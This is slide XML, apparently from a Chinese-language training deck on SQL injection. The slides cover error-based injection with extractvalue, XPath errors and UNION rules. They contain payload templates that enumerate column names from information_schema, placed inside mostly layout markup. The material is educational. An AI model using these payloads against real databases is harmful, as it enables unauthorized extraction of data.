                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>                          from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>='xxx')))) #</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05D9CB4-B27F-45BF-A756-CECD93F2D04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380354" y="5225508"/>
            <a:ext cx="1287217" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>爆列名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47C2D0F3-E1FF-4906-A2C4-94E204F201F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425606" y="1789775"/>
            <a:ext cx="11479349" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>Payload:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>= ' and(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>("anything",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>('~',(select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>)))) #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F258EDA2-44E9-47A5-A88C-A4F0216D87F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4881061" y="2308882"/>
            <a:ext cx="6978642" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>'~'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>可以换成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>等不满足</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>格式的字符</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3447143388"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774635" y="1215274"/>
            <a:ext cx="5008844" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>报错注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F3CF56B-58C1-4505-87D7-4E2CD0C94ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928497" y="1704016"/>
            <a:ext cx="2469888" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>语法错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E5BF69-FF2A-4978-A9D0-98726BA87E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200741" y="1679994"/>
            <a:ext cx="5949977" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>即为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>路径语言（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML Path Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>），它是一种用来确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>文档中某部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的语言。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E6C2AE-4333-4D31-98B0-06B8BDD77FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669128" y="2567213"/>
            <a:ext cx="2469888" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>几个函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6352E97E-CC16-4E06-B8E7-080A8188B679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906432" y="3011730"/>
            <a:ext cx="8307082" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
